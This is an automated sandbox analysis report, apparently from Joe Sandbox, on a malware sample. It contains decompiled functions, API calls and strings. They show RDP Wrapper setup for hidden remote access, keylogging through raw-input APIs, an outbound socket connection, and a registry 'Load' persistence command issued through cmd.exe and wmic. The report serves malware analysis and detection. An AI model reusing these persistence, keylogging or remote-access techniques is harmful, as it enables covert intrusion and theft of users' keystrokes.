API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
String ID: ") do %%A$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
API String ID: 1503101065-2126370993
Opcode ID: 80961d52e32fe55a8ff6bc122a9247515e7bb5147c3ccc805fb7e4c3fb44dd8e
Instruction ID: 47b44b10994412c629e4fd7b21e379ba0e107228ededdb83b54df639f6f40ed5
Opcode Fuzzy Hash: 80961d52e32fe55a8ff6bc122a9247515e7bb5147c3ccc805fb7e4c3fb44dd8e
Instruction Fuzzy Hash: 7FA1FFB1A0010AAFCB04FFA4DCD5DEE777DBFA4240B004569F5826B2A0DF74AA55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0103E5A3 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0103E5A3(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr* _t11;
				void* _t14;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t25;
				void* _t33;
				void* _t42;
				intOrPtr _t43;
				void* _t67;
				intOrPtr _t71;
				void* _t80;

				_t67 = __edx;
				_push(__ecx);
				_push(__ecx);
				InitializeCriticalSection(0x118ad18);
				_t71 = 5;
				asm("xorps xmm0, xmm0");
				 *0x118ad68 = _t71;
				 *0x118ad60 = _t71;
				_t42 = 0x18;
				asm("movups [0x118ad30], xmm0");
				 *0x118ad40 = 0;
				asm("movups [0x118ad48], xmm0");
				 *0x118ad58 = 0;
				 *0x118ad64 = 0;
				_t11 = E01036099(_t42);
				_t82 = _t11;
				if(_t11 == 0) {
					_t43 = 0;
				} else {
					 *_t11 = _t71;
					_t1 = _t11 + 4; // 0x4
					_t43 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x118ad5c = _t43;
				 *0x118ad74 = 0;
				 *0x118ad78 = 0; // executed
				E01033411(0x118ad40, _t67, L"TermService"); // executed
				E01033411(0x118ad4c, _t67, L"%ProgramFiles%"); // executed
				_t14 = E010336F7( &_v12, L"%windir%\\System32"); // executed
				_t68 = _t14;
				_t15 = E010332E6( &_v8, _t14, _t82); // executed
				E01033549(0x118ad58, _t15); // executed
				E01035FEB(_v8);
				_v8 = 0;
				E01035FEB(_v12);
				_t19 = E01041177(_v12);
				_t83 = _t19 - 1;
				if(_t19 != 1) {
					_t69 = 0x118ad4c;
					_t20 = E010332E6( &_v12, 0x118ad4c, __eflags);
					_t80 = 0x118ad50;
					E01033549(0x118ad50, _t20);
					E01035FEB(_v12);
				} else {
					E01033411(0x118ad4c, _t68, L"%ProgramW6432%"); // executed
					_t69 = 0x118ad4c;
					_t33 = E010332E6( &_v12, 0x118ad4c, _t83); // executed
					_t80 = 0x118ad50;
					E01033549(0x118ad50, _t33); // executed
					E01035FEB(_v12);
					E01033411(0x118ad4c, 0x118ad4c, L"%ProgramFiles%"); // executed
				}
				E0103357C(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
				E0103357C(0x118ad4c, _t69, _t83, L"\\Microsoft DN1"); // executed
				_t25 = E0103357C(0x118ad58, _t69, _t83, L"\\rfxvmt.dll"); // executed
				E01040C3E(_t25, _t80);
				E01033549(0x118ad54, _t80); // executed
				E0103357C(0x118ad54, _t69, _t83, L"\\rdpwrap.ini"); // executed
				E0103357C(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
				E0103357C(0x118ad4c, _t69, _t83, L"\\sqlmap.dll"); // executed
				return 0x118ad18;
			}

0x0103e5a3
0x0103e5a6
0x0103e5a7
0x0103e5b0
0x0103e5b8
0x0103e5b9
0x0103e5bc
0x0103e5c4
0x0103e5cc
0x0103e5cd
0x0103e5d4
0x0103e5da
0x0103e5e1
0x0103e5e7
0x0103e5ed
0x0103e5f2
0x0103e5f4
0x0103e606
0x0103e5f6
0x0103e5f6
0x0103e5f8
0x0103e5f8
0x0103e5ff
0x0103e600
0x0103e601
0x0103e602
0x0103e603
0x0103e603
0x0103e608
0x0103e618
0x0103e61e
0x0103e624
0x0103e636
0x0103e643
0x0103e648
0x0103e64d
0x0103e658
0x0103e660
0x0103e668
0x0103e66b
0x0103e670
0x0103e675
0x0103e678
0x0103e6af
0x0103e6b4
0x0103e6b9
0x0103e6c1
0x0103e6c9
0x0103e67a
0x0103e681
0x0103e686
0x0103e68b
0x0103e690
0x0103e698
0x0103e6a0
0x0103e6a8
0x0103e6a8
0x0103e6d6
0x0103e6de
0x0103e6ed
0x0103e6f4
0x0103e701
0x0103e70d
0x0103e71a
0x0103e722
0x0103e730

APIs

InitializeCriticalSection.KERNEL32(0118AD18), ref: 0103E5B0

Part of subcall function 01036099: GetProcessHeap.KERNEL32(00000000,000000F4,01041996,?,76B30770,00000000,01035B72), ref: 0103609C
Part of subcall function 01036099: HeapAlloc.KERNEL32(00000000), ref: 010360A3

Part of subcall function 010332E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 01033319

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

\Microsoft DN1, xrefs: 0103E6CE, 0103E6D5, 0103E6DB
%ProgramFiles%, xrefs: 0103E629, 0103E633, 0103E6A5
TermService, xrefs: 0103E613
\rdpwrap.ini, xrefs: 0103E706
%windir%\System32, xrefs: 0103E63B
%ProgramW6432%, xrefs: 0103E67A
\sqlmap.dll, xrefs: 0103E712, 0103E719, 0103E71F
\rfxvmt.dll, xrefs: 0103E6E3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
API String ID: 2811233055-3289620323
Opcode ID: 6ee3d72bdda58b6f6bea2542c3d8179c96297b9015cced6d1af8d80b0844be1a
Instruction ID: b03900c51b4619300b6974c15d8f4d544f04f7008d32e8bdabb1987f26a20a45
Opcode Fuzzy Hash: 6ee3d72bdda58b6f6bea2542c3d8179c96297b9015cced6d1af8d80b0844be1a
Instruction Fuzzy Hash: 73318270B002115B871DBF69E9D18EE7A6DAFE9901710C23FB182AF2A0DF749D81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0103E5A1 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(0118AD18), ref: 0103E5B0

Part of subcall function 01036099: GetProcessHeap.KERNEL32(00000000,000000F4,01041996,?,76B30770,00000000,01035B72), ref: 0103609C
Part of subcall function 01036099: HeapAlloc.KERNEL32(00000000), ref: 010360A3

Strings

\Microsoft DN1, xrefs: 0103E6CE, 0103E6D5, 0103E6DB
%ProgramFiles%, xrefs: 0103E629, 0103E633, 0103E6A5
TermService, xrefs: 0103E613
\rdpwrap.ini, xrefs: 0103E706
%windir%\System32, xrefs: 0103E63B
%ProgramW6432%, xrefs: 0103E67A
\sqlmap.dll, xrefs: 0103E712, 0103E719, 0103E71F
\rfxvmt.dll, xrefs: 0103E6E3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Heap$AllocCriticalInitializeProcessSection
String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
API String ID: 2038940039-3289620323
Opcode ID: 69467898ec427c56219cda556c3897973145991a649a9ad9a06ace183edfcd0e
Instruction ID: 2d8f0c5d836aa1dd44439c3393b677a9ed630db2112b87ebb0d538ff1a852481
Opcode Fuzzy Hash: 69467898ec427c56219cda556c3897973145991a649a9ad9a06ace183edfcd0e
Instruction Fuzzy Hash: 4E31A770B002115B871CBF65A9D18EE7A6DBFE9601710C23FB182AF2A1DF749981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0103594B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0103594B(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx; // executed
				E01033237(__ecx,  &_a4); // executed
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E0104178E(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8); // executed
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0); // executed
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10); // executed
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				E01035FEB(_a4);
				return _t53;
			}

0x01035951
0x0103595c
0x0103595e
0x0103596c
0x0103596f
0x01035976
0x0103597c
0x01035981
0x01035989
0x01035994
0x01035995
0x01035998
0x010359a0
0x010359ff
0x010359ff
0x010359a2
0x010359aa
0x010359ad
0x010359af
0x010359b5
0x010359bb
0x00000000
0x010359bd
0x010359c0
0x010359c8
0x010359ce
0x010359d2
0x010359d5
0x010359de
0x010359e5
0x010359f1
0x010359fa
0x01035a18
0x01035a1b
0x010359fc
0x010359fc
0x00000000
0x010359fc
0x010359fa
0x010359bb
0x01035a04
0x01035a0f

APIs

Part of subcall function 01033237: lstrcatA.KERNEL32(00000000,76B30770,?,00000000,?,010336D6,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 01033263

Part of subcall function 0104178E: WaitForSingleObject.KERNEL32(?,000000FF,01035974,76B30770,?,?,00000000,01034FB9,?,?,?,?,?,00000000,76B30770), ref: 01041792

getaddrinfo.WS2_32(76B30770,00000000,01034FB9,00000000), ref: 01035998
socket.WS2_32(00000002,00000001,00000000), ref: 010359AF
htons.WS2_32(00000000), ref: 010359D5
freeaddrinfo.WS2_32(00000000), ref: 010359E5
connect.WS2_32(?,?,00000010), ref: 010359F1
ReleaseMutex.KERNEL32(?), ref: 01035A1B

Strings

pREw, xrefs: 01035998

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
String ID: pREw
API String ID: 2516106447-1714215553
Opcode ID: 2ca657117aba21b40d95a2a78eb5535c95393c09a13cbe624e6a3543f4996317
Instruction ID: 0af3919635cfdb66951d90ecde803dfec510116572559e4f22606a7a3aa2165d
Opcode Fuzzy Hash: 2ca657117aba21b40d95a2a78eb5535c95393c09a13cbe624e6a3543f4996317
Instruction Fuzzy Hash: 5C21AB75A00208ABDF10DF65C9C9BDA7BB9EF84321F108066ED45EB1A5C7319A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0103910D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0103910D() {
				intOrPtr _t1;
				intOrPtr _t5;

				_t1 = 5;
				 *0x118a804 = _t1;
				 *0x1189dec = 0;
				 *0x118a7fc = _t1;
				 *0x118a800 = 0;
				E010318C7(0x118a7f8, 0);
				InitializeCriticalSection(0x118a808);
				E010413ED(0x118a834, 0);
				asm("xorps xmm0, xmm0");
				 *0x118a820 = 0;
				asm("movups [0x118a84c], xmm0");
				 *0x118a830 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x118a834);
				_t5 = E01041E88(_t4, "GetRawInputData", 0); // executed
				 *0x118a824 = _t5;
				 *0x118a82c = E01041E88(_t19, "ToUnicode", 0);
				 *0x118a828 = E01041E88(_t19, "MapVirtualKeyA", 0);
				return 0x1189de0;
			}

0x01039110
0x01039113
0x0103911d
0x01039123
0x01039128
0x0103912e
0x01039138
0x01039143
0x01039148
0x0103914b
0x01039156
0x0103915d
0x01039169
0x01039170
0x01039173
0x0103917d
0x0103918e
0x0103919b
0x010391a6

APIs

InitializeCriticalSection.KERNEL32(0118A808,?,01031251), ref: 01039138
LoadLibraryW.KERNEL32(User32.dll,?,01031251), ref: 01039163

Part of subcall function 01041E88: lstrcmpA.KERNEL32(?,01043251,?,open,01043251), ref: 01041EC1

Strings

ToUnicode, xrefs: 01039178
User32.dll, xrefs: 01039151
MapVirtualKeyA, xrefs: 01039189
GetRawInputData, xrefs: 0103916B

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CriticalInitializeLibraryLoadSectionlstrcmp
String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
API String ID: 4274177235-2474467583
Opcode ID: d8cc06d773e9c8f29dbb7c092b6569e5cac710e6a3fc4631471846de08dd2657
Instruction ID: 6911873f3233bb743abf4dd6553b731adb95975e974e371f8e59835d89143baf
Opcode Fuzzy Hash: d8cc06d773e9c8f29dbb7c092b6569e5cac710e6a3fc4631471846de08dd2657
Instruction Fuzzy Hash: F00162F5A606114F8238FF29B58056D3AE5FF9A742700C23BE4A597308DB3418C38FA9

Uniqueness

Uniqueness Score: -1.00%

Function 01035E28 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E01035EB6();
					E01035EE3(0x104c000, 0x104c030);
					GetModuleHandleA(0);
					_t11 = E010454EB( *_t2, 0x104c000, 0x104c000); // executed
					E01035ECB();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}

0x01035e35
0x01035e37
0x01035e3b
0x01035e65
0x01035e65
0x01035e67
0x00000000
0x00000000
0x01035e62
0x01035e62
0x01035e63
0x01035e63
0x01035e72
0x01035e74
0x01035e6b
0x01035e6d
0x00000000
0x00000000
0x01035e6f
0x01035e6f
0x01035e70
0x01035e70
0x00000000
0x01035e70
0x01035e76
0x01035e76
0x01035e76
0x01035e7e
0x01035e84
0x01035e93
0x01035e9a
0x01035ea2
0x01035ea9
0x01035eaf
0x01035eaf
0x01035e3d
0x01035e3e
0x01035e42
0x01035e55
0x01035e55
0x01035e5b
0x01035e5e
0x00000000
0x01035e5e
0x01035e44
0x01035e46
0x01035e46
0x01035e4a
0x00000000
0x00000000
0x01035e4c
0x01035e4d
0x01035e4f
0x01035e53
0x00000000
0x00000000
0x00000000
0x01035e53
0x00000000

APIs

GetCommandLineA.KERNEL32 ref: 01035E2F
GetStartupInfoA.KERNEL32(?), ref: 01035E7E
GetModuleHandleA.KERNEL32(00000000), ref: 01035E9A
ExitProcess.KERNEL32 ref: 01035EAF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 40b18e0fa2617e0f5781b3fe97a0b0de925a089672f021c8e4bb8b33419f5b1e
Instruction ID: cb2d9727c1876ba364e0a3091633e8534f0a8ec32920a3ac299a31c5b8fb05fa
Opcode Fuzzy Hash: 40b18e0fa2617e0f5781b3fe97a0b0de925a089672f021c8e4bb8b33419f5b1e
Instruction Fuzzy Hash: 1101F9B81082414FD77C5A789DC53E93BDEAF9B309B58509CE5C587222C71B480787B5

Uniqueness

Uniqueness Score: -1.00%

Function 010434A2 Relevance: 6.0, APIs: 4, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E010434A2(CHAR* __ecx, signed int* __edx) {
				long _v8;
				void* _t5;
				long _t6;
				signed int _t7;
				void* _t11;
				signed int* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E01031085(0x400000);
				_v8 = 0;
				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t22 = _t5;
				if(_t22 == 0xffffffff) {
					 *_t18 =  *_t18 & 0x00000000;
				}
				_t6 = GetFileSize(_t22, 0);
				 *_t18 = _t6;
				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
				if(_t7 == 0) {
					 *_t18 =  *_t18 & _t7;
				}
				FindCloseChangeNotification(_t22); // executed
				return _t11;
			}

0x010434a5
0x010434ae
0x010434b8
0x010434cc
0x010434cf
0x010434d5
0x010434da
0x010434dc
0x010434dc
0x010434e2
0x010434ed
0x010434f3
0x010434fb
0x010434fd
0x010434fd
0x01043500
0x0104350c

APIs

Part of subcall function 01031085: GetProcessHeap.KERNEL32(00000000,?,010434B7,00400000,?,?,00000000,?,?,01045553), ref: 0103108B
Part of subcall function 01031085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01045553), ref: 01031092

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,01045553), ref: 010434CF
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,01045553), ref: 010434E2
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,01045553), ref: 010434F3
FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,01045553), ref: 01043500

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSize
String ID:
API String ID: 2557216016-0
Opcode ID: 70c981587e78f3acd831a78d7afe0887dbff11ebaec1e1f2904957c42c15aa79
Instruction ID: 91658066c419750a973157a7b73915f9d8be187e10018e4ea23900943f28ba7f
Opcode Fuzzy Hash: 70c981587e78f3acd831a78d7afe0887dbff11ebaec1e1f2904957c42c15aa79
Instruction Fuzzy Hash: A6F0AFB6601210BFE3215A38AC89FFB76ACEB44621F200125FA81E61C0EBB55D0087B4

Uniqueness

Uniqueness Score: -1.00%

Function 0104111B Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0104111B() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return 0 | _t22 != 0x00000000;
			}

0x01041125
0x0104112a
0x0104113c
0x01041140
0x01041144
0x01041152
0x0104115a
0x0104115a
0x01041162
0x01041167
0x01041167
0x01041176

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,76B30770,00000000,76B30770,00000000,?,?,?,?,0104563F,?), ref: 0104112D
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0104563F,?), ref: 01041134
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0104563F,?), ref: 01041152
FindCloseChangeNotification.KERNEL32(00000000), ref: 01041167

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
String ID:
API String ID: 2406157124-0
Opcode ID: 40f00c90711848cfba794c3b531cb202bbf0e60a2ecbeb3dd167d0ea544591ce
Instruction ID: d7008aeef6bb219e6333773f2ef550890150f88044b600dfab7a0e93ebb30240
Opcode Fuzzy Hash: 40f00c90711848cfba794c3b531cb202bbf0e60a2ecbeb3dd167d0ea544591ce
Instruction Fuzzy Hash: ABF04FB5E01218FBDB219BA4DD49BDEBBB8EF04710F104065FA41E6190D7359B48DB90

Uniqueness

Uniqueness Score: -1.00%

Function 010336F7 Relevance: 4.5, APIs: 3, Instructions: 23
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E010336F7(struct _EXCEPTION_RECORD* __ecx, WCHAR* _a4) {
				struct _EXCEPTION_RECORD* _t18;

				_t18 = __ecx;
				 *_t18 = E01035F68(2 + lstrlenW(_a4) * 2);
				E01036077( *_t18, 2 + lstrlenW(_a4) * 2);
				KiUserExceptionDispatcher( *_t18, _a4); // executed
				return _t18;
			}

0x010336fe
0x01033715
0x01033727
0x01033732
0x0103373c

APIs

lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700

Part of subcall function 01035F68: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,010334F4,?,01035B8D,.bss,00000000), ref: 01035F76

lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
KiUserExceptionDispatcher.NTDLL ref: 01033732

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocDispatcherExceptionUserVirtual
String ID:
API String ID: 4104320610-0
Opcode ID: 8495cd50054650cf41fc74a5323acae5ec194c39f9e6dcecfac656380566e7d3
